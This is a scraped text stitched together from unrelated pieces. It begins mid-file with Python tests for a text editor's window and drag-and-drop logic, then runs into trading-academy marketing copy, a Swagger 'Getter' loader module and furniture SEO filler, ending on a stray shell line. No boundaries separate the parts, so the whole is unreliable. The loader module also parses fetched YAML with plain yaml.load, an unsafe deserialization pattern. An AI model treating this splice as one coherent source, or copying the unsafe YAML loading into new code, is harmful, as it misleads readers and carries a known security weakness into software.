c.item_is_project else Editor) if c.item_is_project: obj.can_rename() >> c.can_rename representedObject(item) >> obj with m: result = ed.should_edit_item(col, item) eq_(result, c.result) c = TestConfig(col_is_editable=True, item_is_project=True, result=False) yield test, c(col_is_editable=False) yield test, c(item_is_project=False) yield test, c(can_rename=False) yield test, c(can_rename=True, result=True) def test_copy_path(): pasteboard = mod.Pasteboard() @gentest def test(index, text, config="editor(a) editor(b)*"): with test_app(config) as app: window = app.windows[0] item = [editor for project in window.projects for editor in project.editors][index] window.copy_path(item) eq_(pasteboard.text, text) yield test(0, "a") yield test(1, "b") yield test(0, "a\nc", config="editor(a)* editor(b) editor(c)*") yield test(1, "b", config="editor(a)* editor(b) editor(c)*") def test_close_item(): @gentest def test(index=1, expected="editor(a)*", config="editor(a) editor(b)*"): with test_app(config) as app: window = app.windows[0] item = [editor for project in window.projects for editor in project.editors][index] window.close_item(item) eq_(test_app(app).state, ("window project " + expected).strip()) yield test() yield test(0, "editor(b)*") yield test(0, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*") yield test(2, config="editor(a)* editor(b) editor(c)*", expected="editor(b)*") yield test(config="editor(a)* editor(b) editor(c)*", expected="editor(a)* editor(c)*") def test_window_did_become_key(): @test_app def test(app, c): m = Mocker() ed = Window(app) win = m.mock(ak.NSWindowController) cv = m.property(ed, "current_editor") dv = cv.value >> (m.mock(c.editor_type) if c.has_current else None) if c.has_current and c.editor_type is Editor: dv.document.check_for_external_changes(win) with m: ed.window_did_become_key(win) c = TestConfig(has_current=False, editor_type=Editor) yield test, c yield test, c(has_current=True) yield test, c(has_current=True, editor_type=Project) def test_Window_should_close(): @gentest def test(config, prompts=[], should_close=False, close=True): calls = [] def do_close(): calls.append("close") with test_app(config) as app: window = app.windows[0] for win in app.windows: for project in win.projects: for editor in project.editors: if "/dirty.save" in editor.file_path: 
test_app(app).set_content(editor) if "dirty" in editor.file_path: make_dirty(editor.document) result = window.should_close(do_close) eq_(window.wc.prompts, prompts) eq_(calls, ["close"] if close and not should_close else []) eq_(result, should_close) yield test("editor", should_close=True) yield test("editor(dirty)", ["close dirty"], close=False) yield test("editor(dirty.save)", ["close dirty.save", "save dirty.save"], close=False) # cancel save yield test("editor(/dirty.save)", ["close dirty.save"]) yield test("editor(/dirty.missing)", ["close dirty.missing"], close=False) yield test("editor(/dirty.dont_save)", ["close dirty.dont_save"]) yield test("editor(dirty) window project editor(dirty)", should_close=True) def test_window_will_close(): @test_app def test(app, window_settings_loaded, num_projects): m = Mocker() ed = Window(app) ed.window_settings_loaded = window_settings_loaded app = m.replace(ed, 'app') with m.order(): app.discard_window(ed) with m: ed.window_will_close() yield test, True, 0 yield test, False, 0 yield test, False, 1 yield test, False, 3 def test_get_window_settings(): @test_app def test(app, c): settings = dict( frame_string="<frame string>", splitter_pos="<splitter_pos>", properties_hidden=c.props_hidden, ) m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.wc.frame_string >> settings["frame_string"] ed.wc.splitter_pos >> settings["splitter_pos"] ed.wc.properties_hidden >> (ak.NSOnState if c.props_hidden else ak.NSOffState) with m: result = ed.window_settings eq_(result, settings) c = TestConfig() yield test, c(props_hidden=True) yield test, c(props_hidden=False) def test_set_window_settings_with_null_settings(): with test_app() as app: ed = Window(app) class FakeWindowController(TestConfig): def __setattr__(self, name, value): self.__dict__[name] = value ed.wc = FakeWindowController() ed.window_settings = {} eq_(ed.wc, FakeWindowController(properties_hidden=False)) def test_set_window_settings(): with test_app() as app: m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) fs = "<test frame string>" sp = "<test splitter position>" ed.wc.frame_string = fs ed.wc.splitter_pos = sp ed.wc.properties_hidden = True with m: ed.window_settings = dict(frame_string=fs, splitter_pos=sp, properties_hidden=True) def test_close(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = wc = m.mock(WindowController) ed.projects = [] ed.window_settings_loaded = c.ws_loaded for x in range(3): proj = m.mock(Project) proj.close() ed.projects.append(proj) #wc.docsController.setContent_(None) with m: if not c.wc_is_none: assert ed.wc is not None assert list(ed.projects) ed.close() assert not ed.window_settings_loaded #assert ed.wc is None #assert not list(ed.projects) c = TestConfig(wc_is_none=False) yield test, c(wc_is_none=True, ws_loaded=False) for wsl in (True, False): yield test, c(ws_loaded=wsl) # drag/drop tests ~~~~~~~~~~~~~~~~~~~~~~~ def test_is_project_drag(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list) pb = m.mock(ak.NSPasteboard) result_items = [] info = m.mock() #NSDraggingInfo items = [] pb = info.draggingPasteboard() >> m.mock(ak.NSPasteboard) pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE: id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock() ed.iter_dropped_id_list(id_list) >> items factories = dict( p=(lambda:m.mock(Project)), d=(lambda:m.mock(Editor)), ) elif 
c.accepted_type == ak.NSFilenamesPboardType: pb.propertyListForType_(ak.NSFilenamesPboardType) >> items factories = dict( p=(lambda:"/path/to/project." + const.PROJECT_EXT), d=(lambda:"/path/to/document.txt"), ) else: factories = None if factories is not None: for it in c.items: items.append(factories[it]()) with m: result = ed.is_project_drag(info) eq_(result, c.result) c = TestConfig(result=False) yield test, c(items="", accepted_type="unknown type") for atype in (const.DOC_ID_LIST_PBOARD_TYPE, ak.NSFilenamesPboardType): for items in ("d", "p", "pdp", "ppp"): result = not items.replace("p", "") yield test, c(items=items, accepted_type=atype, result=result) def test_get_id_path_pairs(): @gentest def test(config, indices, path_info): def getitem(index): item = window.projects[index[0]] if len(index) > 1: item = item.editors[index[1]] if item.document.has_real_path(): assert item.file_path.startswith(tmp), item.file_path with open(item.file_path, "w") as fh: pass assert len(index) < 3, index return item with test_app(config) as app: tmp = test_app(app).tmp + os.path.sep window = app.windows[0] items = [getitem(i) for i in indices] result = app.windows[0].get_id_path_pairs(items) eq_(len(result), len(items)) eq_(len(result), len(path_info)) for item, has_path, pair in zip(items, path_info, result): eq_(pair[0], item.id, item) eq_(pair[1], item.file_path if has_path else None) yield test("project", [[0]], [False]) yield test("project editor", [[0, 0]], [False]) yield test("project editor(/file.txt)", [[0, 0]], [True]) def test_validate_drop(): @test_app def test(app, config): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ov = m.mock(ak.NSOutlineView) # TODO investigate where NSDraggingInfo went during the upgrade to 10.5 info = m.mock() #NSDraggingInfo) item = m.mock() index = 0 ed.is_project_drag = m.method(ed.is_project_drag) ed.is_project_drag(info) >> config.is_proj if config.is_proj: if not config.item_is_none: obj = "<item.observedObject>" representedObject(item) >> obj if config.path_is_none: path = None else: path = m.mock(fn.NSIndexPath) path.indexAtPosition_(0) >> config.path_index ov.setDropItem_dropChildIndex_(None, config.path_index) ed.wc.docsController.indexPathForObject_(obj) >> path else: item = None index = config.index if index < 0: ed.projects = ["<proj>"] * config.num_projs ov.setDropItem_dropChildIndex_(None, config.num_projs) else: drop = True if not config.item_is_none: if config.item_is_proj: index = config.index obj = m.mock(type=Project) if index < 0: obj.editors >> (["<doc>"] * config.proj_docs) ov.setDropItem_dropChildIndex_(item, config.proj_docs) else: obj = m.mock(type=Editor) drop = False representedObject(item) >> obj else: item = None index = config.index if config.index < 0: ed.projects = ["<proj>"] * (config.last_proj_index + 1) if config.last_proj_index > -1: path = fn.NSIndexPath.indexPathWithIndex_(config.last_proj_index) proj = m.mock(Project) node = m.mock() ed.wc.docsController.nodeAtArrangedIndexPath_(path) >> node representedObject(node) >> proj proj.editors >> (["<doc>"] * config.proj_docs) ov.setDropItem_dropChildIndex_(node, config.proj_docs) else: ov.setDropItem_dropChildIndex_(None, -1) elif index == 0: drop = False if drop: info.draggingSourceOperationMask() >> ak.NSDragOperationGeneric with m: result = ed.validate_drop(ov, info, item, index) eq_(result, config.result) cfg = TestConfig(is_proj=True, item_is_none=False, result=ak.NSDragOperationMove) for i in (-1, 0, 1, 2): yield test, cfg(item_is_none=True, index=i, 
num_projs=2) yield test, cfg(path_is_none=True, result=ak.NSDragOperationNone) for p in (0, 1, 2): yield test, cfg(path_is_none=False, path_index=p) cfg = cfg(is_proj=False, result=ak.NSDragOperationGeneric) for i in (-1, 0, 2): yield test, cfg(item_is_proj=True, index=i, proj_docs=2) yield test, cfg(item_is_proj=False, result=ak.NSDragOperationNone) cfg = cfg(item_is_none=True) yield test, cfg(index=-1, last_proj_index=-1) yield test, cfg(index=-1, last_proj_index=0, proj_docs=0) yield test, cfg(index=-1, last_proj_index=0, proj_docs=2) yield test, cfg(index=-1, last_proj_index=2, proj_docs=2) yield test, cfg(index=0, result=ak.NSDragOperationNone) yield test, cfg(index=1) yield test, cfg(index=2) def test_accept_drop(): @test_app def test(app, c): m = Mocker() ed = Window(app) ed.wc = m.mock(WindowController) ed.insert_items = m.method(ed.insert_items) ed.iter_dropped_id_list = m.method(ed.iter_dropped_id_list) ed.iter_dropped_paths = m.method(ed.iter_dropped_paths) ov = m.mock(ak.NSOutlineView) # TODO investigate where NSDraggingInfo went during the upgrade to 10.5 parent = None if c.item_is_none else m.mock() index = 0 items = m.mock() pb = m.mock(ak.NSPasteboard) pb.availableTypeFromArray_(ed.supported_drag_types) >> c.accepted_type if c.accepted_type == const.DOC_ID_LIST_PBOARD_TYPE: id_list = pb.propertyListForType_(const.DOC_ID_LIST_PBOARD_TYPE) >> m.mock() ed.iter_dropped_id_list(id_list) >> items act = c.act elif c.accepted_type == ak.NSFilenamesPboardType: act = None paths = pb.propertyListForType_(ak.NSFilenamesPboardType) >> m.mock() items = ed.iter_dropped_paths(paths) >> items else: items = None assert c.accepted_type is None if items is not None: ed.insert_items(items, parent, index, act) >> c.result with m: result = ed.accept_drop(ov, pb, parent, index, c.act) eq_(result, c.result) c = TestConfig(result=True, item_is_none=False, act=None) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.COPY) yield test, c(accepted_type=const.DOC_ID_LIST_PBOARD_TYPE, act=const.MOVE) yield test, c(accepted_type=ak.NSFilenamesPboardType) yield test, c(accepted_type=ak.NSFilenamesPboardType, item_is_none=True) yield test, c(accepted_type=None, result=False) def test_iter_dropped_id_list(): @test_app def test(app, c): m = Mocker() ed = Window(app, None) app = m.replace(ed, 'app') result_items = [] if c.has_ids: ids = [] for it in c.ids: ids.append(it.id) item = m.mock() app.find_item_with_id(it.id) >> (item if it.found else None) if it.found: result_items.append(item) else: ids = None with m: result = list(ed.iter_dropped_id_list(ids)) eq_(result, result_items) c = TestConfig(has_ids=True) ix = lambda id, found=True: TestConfig(id=id, found=found) yield test, c(has_ids=False) yield test, c(ids=[]) yield test, c(ids=[ix(0)]) yield test, c(ids=[ix(0), ix(1)]) yield test, c(ids=[ix(0, False)]) yield test, c(ids=[ix(0), ix(1, False)]) def test_iter_dropped_paths(): def doc(num, tmp): path = os.path.join(tmp, "doc%s.txt" % num) with open(path, mode="w") as fh: fh.write('doc') return path def sym(num, tmp): path = os.path.join(tmp, "doc%s.sym" % num) os.symlink(path + ".txt", path) return path def proj(num, tmp): path = os.path.join(tmp, "proj_%s" % num) os.mkdir(path) return path @test_app def test(app, c): m = Mocker() ed = Window(app) app = m.replace(ed, 'app') dc = m.mock(DocumentController) result_items = [] with tempdir() as tmp: if c.has_paths: paths = [] for it in c.paths: path = it.create(tmp) paths.append(path) 
if it.ignored: continue doc = app.document_with_path(path) \ >> m.mock(path, spec=TextDocument) result_items.append(doc) else: paths = None with m: result = list(ed.iter_dropped_paths(paths)) eq_(result, result_items) c = TestConfig(has_paths=True) def path(create, ignored=False, num=[0]): num[0] += 1 if create is None: return TestConfig(create=(lambda tmp: None), ignored=ignored) return TestConfig(create=partial(create, num[0]), ignored=ignored) yield test, c(has_paths=False) yield test, c(paths=[]) yield test, c(paths=[path(None)]) yield test, c(paths=[path(doc)]) yield test, c(paths=[path(sym)]) yield test, c(paths=[path(doc), path(sym), path(doc)]) yield test, c(paths=[path(proj, ignored=True)]) # yield test, c(paths=[path(proj)]) # yield test, c(paths=[path(proj), path(doc), path(proj)]) #yield test, c(paths=[path(proj, is_open=False)]) def test_insert_items(): def test(c): def get_parent_index(drop, offset=0): if any(v in '0123456789' for v in drop[0]): assert all(v in '0123456789' for v in drop[0]), drop return None, pindex return project, dindex + offset def namechar(item, seen=set()): name = test_app(app).name(item) name = name[len(type(item).__name__):] assert name.startswith(("(", "[", "<")), name assert name.endswith((")", "]", ">")), name name = name[1:-1] assert name not in seen, (item, name) seen.add(name) return name config = [] pindex = dindex = -1 project = None for i, char in enumerate(c.init + ' '): if char == "|": config.append("window") pindex = dindex = -1 continue if char == ' ': if i == c.drop[1]: offset = 1 if project is not None else 0 parent, index = get_parent_index(c.drop, offset) dindex = -1 continue if char == "*": config[-1] += "*" if i == c.drop[1]: raise ValueError("invalid drop index: {!r}".format(c.drop)) continue name = "({})".format(char) if char in '0123456789': item = project = "project" + name pindex += 1 else: item = "editor" + name dindex += 1 config.append(item) if i == c.drop[1]: parent, index = get_parent_index(c.drop) config = " ".join(config) print(config) with test_app(config) as app: name_to_item = {} for window in app.windows: for project in window.projects: char = namechar(project) project.name = char name_to_item[char] = project for editor in project.editors: char = namechar(editor) editor.document.file_path = char name_to_item[char] = editor for char in c.drop[0]: if char not in name_to_item and char not in '0123456789': name_to_item[char] = TextDocument(app, char) items = [name_to_item[char] for char in c.drop[0]] \ if "*" in c.final and c.init != c.final else [] window = app.windows[0] if "project" in c: eq_(c.drop[1], -1, "invalid test configuration; drop index " "must be -1 when project is specified") parent = c.project index = c.drop[1] if c.project == const.CURRENT: args = () elif c.project is None: args = (None,) else: args = (name_to_item[c.project],) else: if parent is None: project = window.get_current_project() if project is not None: parent = "project(%s)" % project.name if parent is not None: parent = name_to_item[parent[8:-1]] if index < 0: index = len(parent.editors) args = (parent, index, c.action) print('drop(%s) %s at %s of %s' % (c.action, c.drop[0], index, parent)) result = window.insert_items(items, *args) eq_(len(result), len(items)) final = ["window"] for char in c.final: if char == " ": continue if char == "|": final.append("window") continue if char == "*": final[-1] += "\\*" continue name = r"\({}\)".format(char) if char in "0123456789": if char not in c.init: name = r"\[.\]" final.append("project" + name) 
continue if char.isupper(): name = "\[{} .\]".format(char.lower()) final.append("editor" + name) final = "^" + " ".join(final) + "$" eq_(test_app(app).state, Regex(final, repr=final.replace("\\", ""))) def eq(a, b): msg = lambda:"{} != {}".format( test_app(app).name(a), test_app(app).name(b), ) eq_(a, b, msg) for window in app.windows: for project in window.projects: eq(project.window, window) for editor in project.editors: eq(editor.project, project) # number = project # letter in range a-f = document # letter in rnage A-F = new editor of document # space before project allows drop on project (insert at end) # pipe (|) delimits windows # so ' 0ab*c 1 2de| 3*fa' is... # window # project 0 # document a # document b (currently selected) # document c # project 1 # project 2 # document d # document e # window # project 3 (currently selected) # document f # document a # # drop=(<dropped item(s)>, <drop index in init>) config = TestConfig(init=' 0ab*c 1 2de') c = config(action=const.MOVE) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0bca* 1 2de') yield test, c(drop=('a', 1), final=' 0bca* 1 2de') yield test, c(drop=('a', 2), final=' 0ab*c 1 2de') yield test, c(drop=('a', 3), final=' 0ab*c 1 2de') yield test, c(drop=('a', 5), final=' 0ba*c 1 2de') yield test, c(drop=('a', 6), final=' 0bca* 1 2de') yield test, c(drop=('a', 7), final=' 0bc 1a* 2de') yield test, c(drop=('a', 8), final=' 0bc 1a* 2de') yield test, c(drop=('a', 9), final=' 0bc 1 2dea*') yield test, c(drop=('a', 10), final=' 0bc 1 2a*de') yield test, c(drop=('a', 11), final=' 0bc 1 2da*e') yield test, c(drop=('a', 12), final=' 0bc 1 2dea*') yield test, c(drop=('f', 0), final=' 0abcF* 1 2de') yield test, c(drop=('f', 1), final=' 0abcF* 1 2de') yield test, c(drop=('f', 2), final=' 0F*abc 1 2de') yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de') yield test, c(drop=('f', 5), final=' 0abF*c 1 2de') yield test, c(drop=('f', 6), final=' 0abcF* 1 2de') yield test, c(drop=('f', 7), final=' 0abc 1F* 2de') yield test, c(drop=('f', 8), final=' 0abc 1F* 2de') yield test, c(drop=('f', 9), final=' 0abc 1 2deF*') yield test, c(drop=('f', 10), final=' 0abc 1 2F*de') yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e') yield test, c(drop=('f', 12), final=' 0abc 1 2deF*') yield test, c(drop=('2', 0), final=' 0abc 1 2*de') yield test, c(drop=('2', 1), final=' 2*de 0abc 1') yield test, c(drop=('2', 2), final=' 2*de 0abc 1') yield test, c(drop=('2', 3), final=' 2*de 0abc 1') yield test, c(drop=('2', 5), final=' 2*de 0abc 1') yield test, c(drop=('2', 6), final=' 2*de 0abc 1') yield test, c(drop=('2', 7), final=' 0abc 2*de 1') yield test, c(drop=('2', 8), final=' 0abc 2*de 1') yield test, c(drop=('2', 9), final=' 0ab*c 1 2de') yield test, c(drop=('2', 10), final=' 0ab*c 1 2de') yield test, c(drop=('2', 11), final=' 0ab*c 1 2de') yield test, c(drop=('2', 12), final=' 0ab*c 1 2de') c = config(action=const.COPY) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, 
c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0abcA* 1 2de') yield test, c(drop=('a', 1), final=' 0abcA* 1 2de') yield test, c(drop=('a', 2), final=' 0A*abc 1 2de') yield test, c(drop=('a', 3), final=' 0aA*bc 1 2de') yield test, c(drop=('a', 5), final=' 0abA*c 1 2de') yield test, c(drop=('a', 6), final=' 0abcA* 1 2de') yield test, c(drop=('a', 7), final=' 0abc 1A* 2de') yield test, c(drop=('a', 8), final=' 0abc 1A* 2de') yield test, c(drop=('a', 9), final=' 0abc 1 2deA*') yield test, c(drop=('a', 10), final=' 0abc 1 2A*de') yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e') yield test, c(drop=('a', 12), final=' 0abc 1 2deA*') c = config(action=None) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0a*bc 1 2de') yield test, c(drop=('a', 1), final=' 0a*bc 1 2de') yield test, c(drop=('a', 2), final=' 0a*bc 1 2de') yield test, c(drop=('a', 3), final=' 0a*bc 1 2de') yield test, c(drop=('a', 5), final=' 0a*bc 1 2de') yield test, c(drop=('a', 6), final=' 0a*bc 1 2de') yield test, c(drop=('a', 7), final=' 0abc 1A* 2de') yield test, c(drop=('a', 8), final=' 0abc 1A* 2de') yield test, c(drop=('a', 9), final=' 0abc 1 2deA*') yield test, c(drop=('a', 10), final=' 0abc 1 2A*de') yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e') yield test, c(drop=('a', 12), final=' 0abc 1 2deA*') yield test, c(drop=('f', 0), final=' 0abcF* 1 2de') yield test, c(drop=('f', 1), final=' 0abcF* 1 2de') yield test, c(drop=('f', 2), final=' 0F*abc 1 2de') yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de') yield test, c(drop=('f', 5), final=' 0abF*c 1 2de') yield test, c(drop=('f', 6), final=' 0abcF* 1 2de') yield test, c(drop=('f', 7), final=' 0abc 1F* 2de') yield test, c(drop=('f', 8), final=' 0abc 1F* 2de') yield test, c(drop=('f', 9), final=' 0abc 1 2deF*') yield test, c(drop=('f', 10), final=' 0abc 1 2F*de') yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e') yield test, c(drop=('f', 12), final=' 0abc 1 2deF*') # cannot copy project yet # yield test, c(drop=('2', 0), final=' 0abc 1 2de') # yield test, c(drop=('2', 1), final=' 2de 0abc 1') # yield test, c(drop=('2', 2), final=' 2de 0abc 1') # yield test, c(drop=('2', 3), final=' 2de 0abc 1') # yield test, c(drop=('2', 4), final=' 2de 0abc 1') # yield test, c(drop=('2', 5), final=' 2de 0abc 1') # yield test, c(drop=('2', 6), final=' 0abc 2de 1') # yield test, c(drop=('2', 7), final=' 0abc 2de 1') # yield test, c(drop=('2', 8), final=' 0abc 1 2de') # yield test, 
c(drop=('2', 9), final=' 0abc 1 2de') # yield test, c(drop=('2', 10), final=' 0abc 1 2de') # yield test, c(drop=('2', 11), final=' 0abc 1 2de') c = config(action=None, init=' 0ab*c 1 2de') yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(action=None, init=' 0abc 1* 2de') yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(action=None, init=' 0abc 1 2de*') yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(init=' 0a | 1bc', action=const.MOVE) yield test, c(drop=('b', 1), final=' 0ab* | 1c*') yield test, c(drop=('b', 2), final=' 0b*a | 1c*') yield test, c(drop=('1', 0), final=' 0a 1*bc |') yield test, c(drop=('1', 1), final=' 1*bc 0a |') # TODO implement move # c = config(init=' 0a* | 1b*c', action=const.MOVE) # yield test, c(drop=('b', 1), final=' 0ab* | 1c*') # yield test, c(drop=('b', 2), final=' 0b*a | 1c*') # # yield test, c(drop=('1', 0), final=' 0a 1b*c |') # yield test, c(drop=('1', 1), final=' 1b*c 0a |') #yield test, c(drop=('a', 6), final=' 0 | 1bca*') # should fail (item inserted in wrong window) def test_undo_manager(): @gentest def test(config, has_doc=True, check_editor=True): with test_app(config) as app: window = app.windows[0] result = window.undo_manager if has_doc: eq_(result, window.current_editor.undo_manager) else: eq_(result, window.no_document_undo_manager) if check_editor: eq_(window.current_editor, None) yield test("window", has_doc=False) yield test("window project", has_doc=False) yield test("window project* editor") yield test("window project editor* editor") yield test("window project editor editor*")
Algowire Trading Academy supports its candidates as they pursue new opportunities in the world of financial markets. Our courses are designed around the requirements of employers and are ideal for working professionals and students alike. Our Career Services remain available to candidates throughout their professional careers, even after they have completed a course with us. Arbitrage Trader/Algo Trader - Algo traders participate in equity markets and use various strategies to earn consistent returns, usually on the proprietary desks of stock brokers. Algorithmic trading requires not only exposure to financial markets but also an understanding of the software used to execute the chosen strategy. It is a lucrative, high-paying role in the financial sector, and with the growth of algorithmic trading in Indian markets there is strong demand for candidates who acquire the relevant skills. Derivative Analyst/Market Risk Analyst - Candidates with exposure to various hedging strategies are also sought by trading houses to develop in-house strategies for proprietary trading and client advisory. Relationship Manager/Advisor - Relationship managers advise clients on trading profitably in the equity market; with the increase in retail participation in equity markets, relationship managers with exposure to financial markets are in great demand. Risk Management/Compliance - Compliance officers usually work in back-office operations for stock brokers and other financial market participants, and are entrusted with keeping operations within the bounds of compliance practices.
from __future__ import absolute_import
from .consts import private
from .utils import patch_path
import json
import yaml
import six
import os
import logging
import re

logger = logging.getLogger(__name__)


class Getter(six.Iterator):
    """ base of getter object

    Ideally, to subclass a getter, you just need to override the load function.
    The part to extend getter would be finalized once Swagger 2.0 is ready.
    """
    def __init__(self, path):
        self.base_path = path

    def __iter__(self):
        return self

    def __next__(self):
        if len(self.urls) == 0:
            raise StopIteration

        obj = self.load(self.urls.pop(0))

        # make sure data is string type
        if isinstance(obj, dict):
            pass
        elif isinstance(obj, six.binary_type):
            obj = obj.decode('utf-8')
        elif not isinstance(obj, six.string_types):
            raise ValueError('Unknown types: [{0}]'.format(str(type(obj))))

        # a very simple logic to distinguish json and yaml
        if isinstance(obj, six.string_types):
            try:
                if obj.startswith('{'):
                    obj = json.loads(obj)
                else:
                    obj = yaml.load(obj)
            except ValueError:
                raise Exception('Unknown format startswith {0} ...'.format(obj[:10]))

        return obj

    def load(self, path):
        """ load the resource, and return for parsing.

        :return: name and json object of resources
        :rtype: (str, dict)
        """
        raise NotImplementedError()


class LocalGetter(Getter):
    """ default getter implementation for a local resource file """

    def __init__(self, path):
        super(LocalGetter, self).__init__(path)

        if path.startswith('file://'):
            parsed = six.moves.urllib.parse.urlparse(path)
            path = parsed.path
            if re.match('^/[A-Z]+:', path) is not None:
                path = os.path.abspath(path[1:])

        for n in private.SWAGGER_FILE_NAMES:
            if self.base_path.endswith(n):
                self.base_path = os.path.dirname(self.base_path)
                self.urls = [path]
                break
            else:
                p = os.path.join(path, n)
                if os.path.isfile(p):
                    self.urls = [p]
                    break
        else:
            # there is no file matching a predefined file name:
            # - resource_list.json (1.2)
            # - swagger.json (2.0)
            # in this case, we will locate them in this way:
            # - when 'path' points to a specific file, and its
            #   extension is either 'json' or 'yaml'.
            _, ext = os.path.splitext(path)
            for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
                if ext.endswith(e):
                    self.base_path = os.path.dirname(path)
                    self.urls = [path]
                    break
            else:
                for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]:
                    #print(path + '.' + e)
                    if os.path.isfile(path + '.' + e):
                        self.urls = [path + '.' + e]
                        break
                else:
                    raise ValueError('Unable to locate resource file: [{0}]'.format(path))

    def load(self, path):
        logger.info('to load: [{0}]'.format(path))

        path = patch_path(self.base_path, path)
        logger.info('final path to load: [{0}]'.format(path))

        ret = None
        with open(path, 'r') as f:
            ret = f.read()

        return ret


class SimpleGetter(Getter):
    """ a simple getter that doesn't have to deal with the file loading of LocalGetter """

    __simple_getter_callback__ = lambda url: {}
    """ the callback to load the resource;
    accepts an URL and returns a string buffer
    """

    def __init__(self, path):
        if isinstance(path, six.string_types):
            super(SimpleGetter, self).__init__(path)
            if self.base_path.endswith('/'):
                self.base_path = self.base_path[:-1]
            self.urls = [path]
        else:
            raise Exception('Unsupported type for "path": {} in SimpleGetter'.format(str(type(path))))

    def load(self, path):
        logger.info('to load: [{0}]'.format(path))

        return self.__simple_getter_callback__.__func__(path)


def _url_load(path):
    ret = f = None
    try:
        f = six.moves.urllib.request.urlopen(path)
        ret = f.read()
    finally:
        if f:
            f.close()

    return ret


class UrlGetter(SimpleGetter):
    """ default getter implementation for a remote resource file """

    __simple_getter_callback__ = _url_load


class DictGetter(Getter):
    """ a getter that accepts a dict as parameter, without loading from file / url

    args:
     - urls: the urls to be loaded in upcoming resolving (the order should be
       matched to get a correct result)
     - path2dict: a mapping from 'path' to 'dict', which is the mocking of
       'downloaded data'
    """
    def __init__(self, urls, path2dict):
        super(DictGetter, self).__init__(urls[0])
        self.urls = urls
        self._path2dict = path2dict or {}

    def load(self, path):
        logger.info('to load: [{0}]'.format(path))

        return self._path2dict.get(path, {})
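For illustration only (not part of the source above): a minimal sketch of how DictGetter might be used, for example in tests. The import path and the spec contents below are placeholder assumptions; iterating a Getter pops each url in order and returns the loaded object, and DictGetter.load simply looks the path up in the supplied mapping.

# minimal usage sketch; the import path and spec are placeholders, not from the source
from getter import DictGetter   # assuming the module above is importable as `getter`

spec = {'swagger': '2.0', 'info': {'title': 'demo', 'version': '1.0'}, 'paths': {}}
g = DictGetter(['swagger.json'], {'swagger.json': spec})

for doc in g:                    # yields the pre-parsed dict for each url, in order
    print(doc['info']['title'])  # -> demo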
The Lionsstar Möbel article is inspiration for home interiors, posted in the Haus möbel category as a collection of ideas for remodeling your Haus möbel accessories. It can serve as a reference when you are unsure which decoration is right for your home, since having a home with a design of our own is everyone's dream. We hope these Lionsstar Möbel ideas meet your need for inspiration when designing your Haus möbel accessories. If you need more ideas for home and interior accessories, check the collection below this post, and visit 21stcenturyfluency.com for new and fresh posts about Haus möbel and other inspiration every day.
#cat get_size.py
